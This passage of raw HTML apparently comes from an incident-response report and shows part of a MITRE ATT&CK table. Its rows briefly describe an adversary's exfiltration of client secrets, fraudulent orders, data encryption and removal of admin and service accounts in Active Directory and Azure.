!important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1041: Exfiltration Over C2 Channel</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1606043451" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{96}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary exfiltrated approximately 2,500 client secrets and personal information.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="152466364" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{107}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">2</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="44" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="852093794" paraeid="{526a9e21-1cce-4009-80ff-b256782d71e0}{34}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Impact</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="262754483" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{137}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1657: Financial Theft</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="860154207" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{144}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used company resources to place orders totaling hundreds of thousands of US dollars for various products which were successfully delivered.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="962594537" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{151}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="45" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1806409579" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{137}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="610841959" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{159}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1486 Data Encrypted for Impact</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1505957352" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{166}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary encrypted victim data.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="837499323" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{173}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="46" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="802815548" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{141}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="993617492" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{181}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1531 Account Access Removal</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2058944509" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{188}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary disabled admin accounts and deleted service accounts in the Active Directory (AD) and Azure</span></span><span class="EOP SCXW67619765 BCX4" 